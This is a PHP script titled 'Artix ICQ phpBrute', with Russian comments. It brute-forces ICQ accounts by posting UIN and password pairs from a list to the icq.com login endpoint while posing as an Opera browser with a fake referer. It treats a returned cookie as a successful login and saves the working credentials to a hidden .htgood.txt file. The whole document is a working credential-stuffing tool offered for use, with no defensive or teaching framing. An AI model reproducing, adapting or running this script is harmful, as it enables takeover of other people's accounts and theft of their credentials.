$config=array();
$config['good']='./.htgood.txt'; ///Складывать хорошие номера суда(рекомендую приставку .ht, тогда файл нельзя будет из веб прочитать)
$config['pass']='./pass.txt'; ///Лист паролей
$config['separator']=';'; /// Разделитель уин;pass
$config['host']='www.icq.com'; /// HTTP сервер мирабов
$config['port']=80; /// HTTP порт
$config['statfile']='./stat.html'; ///Служебный файл
///Если брутер запущен, то выдаем результат работы
if(file_exists($config['statfile']))
{
include($config['statfile']);
echo '
</body>
</html>';
exit();
}
///Типа притворяемся браузером
$request = "POST /karma/login.php HTTP/1.1\r\n";
$request .= "Host: ".$config['host']." \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "rulez\r\n";
$request .= "Keep-Alive: 300\r\n";
$request .= "Connection: keep-alive\r\n";
$request .= "Referer: http://yandex.ru/ \r\n";
///Плохие и хорошие уины
$goodcount=0;
$badcount=0;
///Открытие файла с паролями
$pass=file($config['pass']);
///Непосредственно брут
for($i=0;$i<count($pass);$i++)
{
list($s,$s1)=explode($config['separator'],$pass[$i]);
///Данные для отправки к мирабам
$posts = array ( 'dest' => '/whitepages/user_details.php',
'desc' => '',
'service' => '20',
'css'=> 'whitepages',
'uin_email'=> $s,
'password' => trim($s1)
);
$postValues="";
$s='';
///Кодирование
foreach( $posts AS $name => $value )
{
$postValues .= urlencode($name) . "=" . urlencode($value) . '&';
}
///Создаем post запрос
$lenght = strlen($postValues);
$request2 = $request."Content-Type: application/x-www-form-urlencoded\r\n";
$request2 .= "Content-Length: $lenght\r\n";
$request2 .= "\r\n";
$request2 .= $postValues;
///Открываем сокет
$fp = fsockopen($config['host'],$config['port'], $errno, $errstr, 30);
if (!$fp)
{
///На случай ошибки
echo "$errstr ($errno)<br />\n";
}
else
{
///Отправляем данные на whitepages
fwrite($fp, $request2);
while (!feof($fp))
{
$s.=fgets($fp, 128);
}
}
///Закрываем сокет
fclose($fp);
///Если аська залогинилась, то whitepages посылает куки, которые мы и ловим. Всю страницу мы не скачиваем
if(strpos($s,'Set-C*****')==true)
{
$good=fopen($config['good'],'a');
fwrite($good,$pass[$i]);
fclose($good);
$goodcount++;
}
else $badcount++;
if($i%10==0)
{
$count=count($pass)-$i;
///Обновление статистики
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Осталось: $count<br>
---<br>
HTML;
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
}
}
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Работа завершена. <br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Для продолжения, удалите файл со статистикой<br>
---<br>
HTML;
///Запись конечного результата в файл
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
///Брут завершен
?>
©Tyson